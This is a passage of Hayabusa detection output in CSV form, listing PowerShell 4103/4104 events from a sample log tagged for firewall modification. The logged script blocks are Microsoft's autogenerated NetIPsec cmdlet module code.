$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_valu,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.444 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"e; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecDospSetting' -Alias '*' function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecDospSetting' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.445 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.449 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.450 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.450 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.451 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.452 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecDospSetting"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.462 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.462 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.463 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.463 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.476 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeSA')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeSA}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeSA')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, 